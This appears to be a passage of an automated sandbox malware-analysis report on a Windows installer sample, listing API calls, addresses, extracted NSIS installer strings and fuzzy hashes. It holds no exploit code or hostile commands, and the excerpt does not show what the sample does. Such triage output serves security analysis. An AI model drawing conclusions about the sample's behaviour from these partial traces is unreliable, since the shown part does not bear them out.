                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                              • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                              • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                              • String ID: F$N$open
                                                                                                                                                                                                                                                                              • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                              • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                              • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                              • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                              • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                              • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                              • String ID: F
                                                                                                                                                                                                                                                                              • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                              • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                              • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                              • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                              • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                              • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                              • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                              • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                              • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                              • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                              • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                              • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                              • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                              • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                              • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                              • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(Completed,00426976,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,Completed,00426976,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(Completed,004034E5,004034E5,Completed,00426976,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(Completed,Completed), ref: 0040500B
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                              • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                              • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                              • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                              • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                              • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                              • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                              • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                              • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                              • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                              • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                              • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(Completed,00426976,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,Completed,00426976,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(Completed,004034E5,004034E5,Completed,00426976,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(Completed,Completed), ref: 0040500B
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                              • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                              • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                              • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                              • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                              • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                              • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                              • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                              • String ID: f
                                                                                                                                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                              • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                              • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
• MulDiv.KERNEL32(00075000,00000064,00136FFC), ref: 00403295
• wsprintfW.USER32 ref: 004032A5
• SetWindowTextW.USER32(?,?), ref: 004032B5
• SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
Strings
• verifying installer: %d%%, xrefs: 0040329F
Memory Dump Source
• Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_putt.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
• CharNextW.USER32(?,?,?,00000000), ref: 004060D6
• CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
• CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_putt.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":
• API String ID: 589700163-165019052
APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
• RegCloseKey.ADVAPI32(?), ref: 00401504
• RegCloseKey.ADVAPI32(?), ref: 00401529
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
Memory Dump Source
• Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_putt.jbxd
Similarity
• API ID: Close$DeleteEnumOpen
• String ID:
• API String ID: 1912718029-0
APIs
• GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
• GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
• GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
• VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
• GlobalFree.KERNEL32(00634E08), ref: 00402387
Memory Dump Source
• Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                              • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                              • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
